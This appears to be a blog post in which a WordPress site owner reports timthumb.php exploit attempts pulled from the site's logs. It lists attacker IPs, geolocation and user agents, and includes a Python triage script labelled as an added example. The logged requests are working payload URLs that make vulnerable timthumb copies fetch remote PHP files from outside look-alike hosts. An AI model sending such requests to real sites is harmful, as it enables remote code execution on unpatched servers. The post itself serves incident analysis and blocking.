Since I created db_error.php, I have been receiving all sorts of database-related error reports by email.
These db_error emails normally land in my regular inbox, but this time one was flagged as spam for some reason. When I looked into why, I found that it had been triggered by an attempt to exploit the well-known timthumb.php vulnerability in WordPress.
Unfortunately for the attacker, our WordPress site does not use timthumb or anything like it, so the attack failed, but I am publishing the attacker's related information below.
In fact, when I checked the logs there were a huge number of these timthumb attacks. Extracting just the timthumb requests since the beginning of this year, it turned out there had been more than 600! For a start, the attackers' IPs will have to be blocked.
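As an added example (not code from the original post), here is a small Python script for the log triage described above: it parses Apache combined-format access log lines, flags requests for timthumb.php, separates bare path scans from requests whose src= host merely contains a trusted domain name (the pattern that fooled the old TimThumb allow-list check, which matched trusted domains as substrings), and counts hits per client IP so a block list can be built. The log lines, IPs and hostnames are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [22/May/2012:13:04:16 +0000] "GET /wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.example.net/load.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
192.0.2.10 - - [22/May/2012:13:10:02 +0000] "GET /some-post/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.example.net%2FIN.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
192.0.2.20 - - [18/Apr/2012:09:00:00 +0000] "GET /wp-content/themes/arras/library/timthumb.php HTTP/1.1" 404 512 "-" "Mozila/4.0"
192.0.2.30 - - [16/Feb/2012:04:51:34 +0000] "GET /wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.example.org/myid.php HTTP/1.1" 404 512 "-" "Mozilla/3.0"
198.51.100.5 - - [16/Feb/2012:05:00:00 +0000] "GET /wp-content/uploads/2012/03/photo.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Domains that old TimThumb releases accepted by substring match on the host;
# a bypass probe uses a hostname that merely contains one of them.
TRUSTED = ("picasa.com", "blogger.com", "wordpress.com", "img.youtube.com", "flickr.com")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" \d{3}')

def classify(uri):
    """Label a request URI, or return None when it is not a timthumb request."""
    if "timthumb" not in uri.lower():
        return None
    src = parse_qs(urlsplit(uri).query).get("src", [None])[0]
    if src is None:
        return "timthumb-scan"               # path enumeration, no payload URL
    host = (urlsplit(src).hostname or "").lower()
    for t in TRUSTED:
        if t in host and host != t and not host.endswith("." + t):
            return "timthumb-domain-bypass"  # e.g. picasa.com.example.net
    return "timthumb-remote-src"             # remote src on a site without timthumb

def scan(log_text):
    """Count timthumb requests per client IP and collect the labels seen."""
    hits, labels = Counter(), {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["uri"])
        if label:
            hits[m["ip"]] += 1
            labels.setdefault(m["ip"], set()).add(label)
    return hits, labels

if __name__ == "__main__":
    hits, labels = scan(SAMPLE_LOG)
    for ip, n in hits.most_common():        # most active first: block-list order
        print(f"{ip:16} {n:3d}  {', '.join(sorted(labels[ip]))}")
```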
-
Attacker #1: attacked 5 times between 2012/05/22 13:04:16 and 13:32:17 UTC.
Methods used in the attack
/(article name on this site)/wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php
//wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
/(article name on this site)/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php
Attacker's IP address: 178.32.137.94
General information from the IP address
IP: 178.32.137.94
Decimal: 2988476766
Hostname: 178-32-137-94.ovh.net
ISP: Ovh Systems
Organization: OVH Srl
Services: None detected
Type: (blank)
Assignment: Static IP
Geolocation from the IP address
Country: Italy
Latitude: 42.8333
Longitude: 12.8333
Other information
Remote host: 178-32-137-94.ovh.net
Attacker's user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Information from the user agent (the following is from UserAgentString.com)
Firefox 3.6
Mozilla: MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore
5.0: Mozilla version
Windows: Platform
U: Security values: N for no security, U for strong security, I for weak security
Windows NT 5.1: Operating System: Windows XP
en-US: Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface); en-US = English – United States
rv:1.9.2: CVS Branch Tag; the version of Gecko being used in the browser
Gecko: Gecko engine inside
20100115: Build Date; the date the browser was built
Firefox: Name: Firefox
3.6: Firefox version
-
Attacker #2: attacked 120 times in the period 2012/04/18 ~ UTC,
and 121 times in the period 2012/05/13 ~ UTC. Methods used in the attack (121 entries, duplicates removed)
Attacker's IP address: 91.201.64.85
General information from the IP address
IP: 91.201.64.85
Decimal: 1539915861
Hostname: 91.201.64.85
ISP: DonEkoService Ltd
Organization: DonEkoService Ltd
Services: None detected
Type: Broadband
Assignment: Static IP
Geolocation from the IP address
Country: Russian Federation
Latitude: 60
Longitude: 100
Other information
Remote host: 91.201.64.85
Attacker's user agent: Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Information from the user agent (the following is from UserAgentString.com)
Internet Explorer 6.0
Mozila: ???
4.0: ???
compatible: Compatibility flag; indicates that this browser is compatible with a common set of features
MSIE 6.0: Name: Internet Explorer version 6.0
Windows NT 5.1: Operating System: Windows XP
-
Attacker #3: attacked 3 times between 2012/01/16 08:48:30 and 08:58:46 UTC.
Methods used in the attack (duplicates removed)
/(article name on this site)/wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php
/wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php
Attacker's IP address: 176.9.44.3
General information from the IP address
IP: 176.9.44.3
Decimal: 2953391107
Hostname: h124526.exima-online.net
ISP: Hetzner Online AG
Organization: Hetzner Online AG
Services: None detected
Type: Corporate
Assignment: Static IP
Geolocation from the IP address
Country: Germany
Latitude: 51
Longitude: 9
Other information
Remote host: h124526.exima-online.net
Attacker's user agent: BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212
Information from the user agent (the following is from UserAgentString.com)
BlackBerry
BlackBerry8310: Name: BlackBerry model 8310
4.5.0.55: Operating System: BlackBerryOS, OS Version 4.5.0
Profile: Profile, see next line
MIDP-2.0: Mobile Information Device Profile, a specification published for the use of Java on embedded devices; Version 2.0
Configuration: Configuration, see next line
CLDC-1.1: Connected Limited Device Configuration, is a specification of a framework for Java ME applications; Version 1.1
VendorID: Id of the vendor
212: Vendor: Etisalat/Etisalat Nigeria/Etisalat Misr
Description: Browser for the BlackBerry smartphone
-
Attacker #4: attacked 3 times between 2012/02/16 4:51:34 and 4:51:41 UTC.
Methods used in the attack (duplicates removed)
/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
/(category name on this site)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
/(category name on this site)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
Attacker's IP address: 178.255.45.99
General information from the IP address
IP: 178.255.45.99
Decimal: 3003067747
Hostname: da01.gda.vipower.pl
ISP: Artnet Spolka z ograniczona odpowiedzialnoscia
Organization: Vibiznes
Services: None detected
Type: (blank)
Assignment: Static IP
Geolocation from the IP address
Country: Poland
State/Region: Mazowieckie
City: Warsaw
Latitude: 52.25
Longitude: 21
Other information
Remote host: da01.gda.vipower.pl
Attacker's user agent: Mozilla/3.0 (OS/2; U)
Information from the user agent (the following is from UserAgentString.com)
Netscape 3.0
Mozilla: MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore
3.0: Browser version
OS/2: Operating System: OS/2
U: Security values: N for no security, U for strong security, I for weak security
-
Attacker #5: attacked 2 times between 2012/05/22 16:56:39 and 16:56:43 UTC.
Methods used in the attack (duplicates removed)
/(article name on this site)/wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
/wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
Attacker's IP address: 184.107.145.18
General information from the IP address
IP: 184.107.145.18
Decimal: 3094057234
Hostname: 184.107.145.18
ISP: Iweb Technologies
Organization: Gate
Services: None detected
Type: Broadband
Assignment: Static IP
Geolocation from the IP address
Country: Canada
State/Region: Quebec
City: Montreal
Latitude: 45.5
Longitude: -73.5833
Postal Code: h3e1z6
Other information
Remote host: 184.107.145.18
Attacker's user agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i
Information from the user agent (the following is from UserAgentString.com)
Safari
Mozilla: MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore
5.0: Mozilla version
SymbianOS: Operating System: SymbianOS
9.1: SymbianOS version
U: Security values: N for no security, U for strong security, I for weak security
en-us: Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface); en-us = English – United States
AppleWebKit: The Web Kit provides a set of core classes to display web content in windows
413: Web Kit build
KHTML: Open Source HTML layout engine developed by the KDE project
like Gecko: like Gecko…
Safari: Name: Safari
413: Safari build number
es61i: Nokia handset model name